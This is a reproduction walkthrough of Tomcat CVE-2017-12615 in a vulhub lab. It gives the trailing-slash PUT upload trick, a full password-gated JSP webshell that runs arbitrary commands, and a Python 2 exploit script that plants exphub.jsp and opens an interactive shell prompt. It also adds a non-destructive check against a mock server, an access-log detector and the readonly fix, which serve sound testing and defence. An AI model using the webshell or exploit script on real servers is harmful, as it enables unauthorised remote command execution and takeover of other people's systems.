tomcat-CVE-2017-12615 reproduction
1
Environment (vulhub on GitHub)
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
2
Open http://your ip:8080
Scanning with a script shows the target is affected by CVE-2017-12615
3
Capture the request with Burp Suite
Then craft the upload request: PUT /1.jsp/ HTTP/1.1
The trailing slash is the whole trick. A PUT to /1.jsp goes to the JSP servlet, which only serves GET, POST and HEAD; /1.jsp/ is instead handled by the DefaultServlet, which strips the slash and writes 1.jsp into the webroot (a trailing %20 behaves the same way). The DefaultServlet only accepts PUT when its readonly init-param in conf/web.xml is set to false, which is how the vulhub environment is configured; on a stock install the request is answered with 403, and setting readonly back to true is the fix. A 201 Created response means the file was written.
Shell code (the JSP webshell sent as the PUT body; pwd is the access password, cmd the command to run)
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
} else {
    out.println(":-)");
}
%>
4
Visit the uploaded shell. The file name must match the one used in the PUT (1.jsp above), requested without the trailing slash:
http://192.168.1.132:8080/1.jsp?pwd=023&cmd=whoami
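The upload and read-back of steps 3 and 4, written as a non-destructive check that can be pointed at the vulhub target. This is an added example, not code from the original post or from vulhub: it PUTs a random text marker instead of a shell, confirms the file is served back, then deletes it. The MockTomcat class is an assumed stand-in so the script runs offline; the only real behaviour it imitates is that the DefaultServlet answers a PUT with 201 when readonly is false and 403 when it is true, and that the JSP servlet refuses PUT without the trailing suffix.

```python
"""Non-destructive check for the Tomcat PUT-with-trailing-suffix upload.
Added example, not from the original post or vulhub.  MockTomcat is an
assumed stand-in for the DefaultServlet so the script runs offline.
"""
import http.client
import secrets
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Suffixes that route a *.jsp PUT to the DefaultServlet, which strips them.
BYPASS_SUFFIXES = ("/", "%20")

def http_request(base_url, method, path, body=None):
    """One request on a fresh connection; returns (status, body_bytes)."""
    u = urlsplit(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=5)
    try:
        conn.request(method, path, body=body,
                     headers={"Content-Type": "text/plain"} if body else {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()

def check_put_upload(base_url):
    """Return (vulnerable, detail). Removes the marker file it creates."""
    name = "chk_%s.jsp" % secrets.token_hex(4)          # random, not a shell
    marker = ("put-check %s" % secrets.token_hex(8)).encode()
    for suffix in BYPASS_SUFFIXES:
        put_path = "/%s%s" % (name, suffix)
        status, _ = http_request(base_url, "PUT", put_path, body=marker)
        if status not in (201, 204):      # Tomcat: 201 created, 204 overwritten
            continue
        got, body = http_request(base_url, "GET", "/" + name)
        http_request(base_url, "DELETE", put_path)      # clean up
        if got == 200 and marker in body:
            return True, "PUT %s -> %d, /%s served back" % (put_path, status, name)
    return False, "no PUT variant produced a readable file"

class MockTomcat(BaseHTTPRequestHandler):
    """Assumed minimal imitation of Tomcat's DefaultServlet (not real Tomcat)."""
    readonly = True
    files = None          # per-server dict, set in start_mock

    def _target(self):
        for s in BYPASS_SUFFIXES:
            if self.path.endswith(s):
                return self.path[:-len(s)], True
        return self.path, False

    def _reply(self, status, data=b""):
        self.send_response(status)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        path, bypassed = self._target()
        data = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if path.endswith(".jsp") and not bypassed:
            self._reply(405)          # JSP servlet: no PUT without the suffix
        elif self.readonly:
            self._reply(403)          # DefaultServlet with readonly=true
        else:
            self.files[path] = data   # readonly=false: file is written
            self._reply(201)

    def do_GET(self):
        data = self.files.get(self.path)
        if data is None:
            self._reply(404)
        else:
            self._reply(200, data)

    def do_DELETE(self):
        path, _ = self._target()
        if self.readonly:
            self._reply(403)
        else:
            self.files.pop(path, None)
            self._reply(204)

    def log_message(self, *args):     # keep the demo quiet
        pass

def start_mock(readonly):
    """Start a MockTomcat on a free port; returns (server, base_url, handler)."""
    handler = type("Mock", (MockTomcat,), {"readonly": readonly, "files": {}})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1], handler

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) == 2 else start_mock(readonly=False)[1]
    print(check_put_upload(target))
```

Run it with the target URL (for example http://192.168.1.132:8080) to test a real host, or with no argument to see the result against the offline mock. A 403 on both variants is what a correctly configured DefaultServlet returns.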
5
Using the script
cve-2017-12615_cmd.py (Python 2; it uploads a temporary webshell named exphub.jsp with the same trailing-slash PUT and then gives an interactive prompt)
python2 cve-2017-12615_cmd.py http://192.168.1.132:8080
The version range printed in the banner is only informational: what decides whether the PUT lands is the DefaultServlet's readonly setting, not the Tomcat version.
#!/usr/bin/env python
# coding:utf-8
# Python 2: PUT a temporary JSP shell (exphub.jsp) using the trailing-slash
# bypass, verify it answers, then loop reading commands from the prompt.
import requests
import sys
import time

if len(sys.argv) != 2:
    print('+----------------------------------------------------------+')
    print('+ USE: python <filename> <url>                             +')
    print('+ EXP: python cve-2017-12615_cmd.py http://1.1.1.1:8080    +')
    print('+ VER: Apache Tomcat 7.0.0 - 7.0.81                        +')
    print('+----------------------------------------------------------+')
    print('+ DES: temporarily creates the webshell exphub.jsp         +')
    print('+----------------------------------------------------------+')
    sys.exit()

url = sys.argv[1]
# The trailing "/" routes the PUT to the DefaultServlet, which writes exphub.jsp.
payload_url = url + "/exphub.jsp/"
payload_header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}

def payload_command(command_in):
    # HTML-escape a command and wrap it in <string> tags (not used below;
    # kept from the original script).
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&#39;",
        ">": "&gt;",
        "<": "&lt;",
    }
    command_filtered = "<string>" + "".join(html_escape_table.get(c, c) for c in command_in) + "</string>"
    payload_1 = command_filtered
    return payload_1

def creat_command_interface():
    # Minimal JSP shell: runs the "cmd" parameter and streams its stdout back.
    payload_init = "<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();" \
                   "int a = -1;" \
                   "byte[] b = new byte[2048];" \
                   "while((a=in.read(b))!=-1){out.println(new String(b, 0, a));}" \
                   "%>"
    result = requests.put(payload_url, headers=payload_header, data=payload_init)
    time.sleep(5)
    payload = {"cmd": "whoami"}
    # The shell is requested without the trailing slash.
    verify_response = requests.get(payload_url[:-1], headers=payload_header, params=payload)
    if verify_response.status_code == 200:
        return 1
    else:
        return 0

def do_post(command_in):
    payload = {"cmd": command_in}
    result = requests.get(payload_url[:-1], params=payload)
    print result.content

if creat_command_interface() == 1:
    print "[+] Put Upload Success: " + payload_url[:-1] + "?cmd=id\n"
else:
    print("[-] This host is not vulnerable CVE-2017-12615")
    exit()

while 1:
    command_in = raw_input("Shell >>> ")
    if command_in == "exit":
        exit(0)
    do_post(command_in)
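The defensive counterpart to the script above, added here and not part of the original post: a detector that walks Tomcat access-log lines and flags PUT or DELETE requests whose target is a .jsp name with a trailing "/" or "%20", records whether the write succeeded (201 or 204) and whether the same address then fetched the written file, which is the shell being used as in step 4. The sample lines are constructed in Tomcat's default "common" access-log pattern (%h %l %u %t "%r" %s %b); the addresses and file names are made up.

```python
"""Flag PUT/DELETE requests that use the trailing-suffix JSP write bypass.
Added example, not from the original post.  SAMPLE_LOG is constructed."""
import re

# Tomcat "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# A .jsp/.jspx name followed by the suffix that diverts it to the DefaultServlet
SUFFIX_RE = re.compile(r'^(?P<name>\S+\.jspx?)(?P<suffix>/|%20)$', re.IGNORECASE)

SAMPLE_LOG = """\
192.168.1.10 - - [17/Sep/2017:10:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 11156
192.168.1.77 - - [17/Sep/2017:10:00:05 +0000] "PUT /1.jsp/ HTTP/1.1" 201 -
192.168.1.77 - - [17/Sep/2017:10:00:06 +0000] "GET /1.jsp?pwd=023&cmd=whoami HTTP/1.1" 200 31
192.168.1.77 - - [17/Sep/2017:10:00:09 +0000] "PUT /exphub.jsp%20 HTTP/1.1" 403 -
192.168.1.10 - - [17/Sep/2017:10:00:12 +0000] "PUT /upload/report.txt HTTP/1.1" 201 -
"""

def find_put_bypass(log_text):
    """Return one finding dict per suspicious PUT/DELETE, in log order."""
    findings, pending = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if m["method"] in ("PUT", "DELETE"):
            s = SUFFIX_RE.match(m["target"])
            if not s:
                continue                      # ordinary PUT, e.g. to a .txt
            f = {
                "host": m["host"],
                "method": m["method"],
                "target": m["target"],
                "written_name": s["name"],    # what the DefaultServlet wrote
                "status": int(m["status"]),
                "succeeded": m["status"] in ("201", "204"),
                "followed_by_get": False,
            }
            findings.append(f)
            if f["succeeded"] and m["method"] == "PUT":
                pending[(m["host"], s["name"])] = f
        elif m["method"] == "GET":
            # Later GET of the written name from the same host: shell in use.
            key = (m["host"], m["target"].split("?", 1)[0])
            if key in pending:
                pending[key]["followed_by_get"] = True
    return findings

if __name__ == "__main__":
    for f in find_put_bypass(SAMPLE_LOG):
        print(f)
```

Treat a finding with succeeded set as a confirmed file write, not just an attempt; a 403 line is still worth alerting on, since it shows someone probing for the bypass.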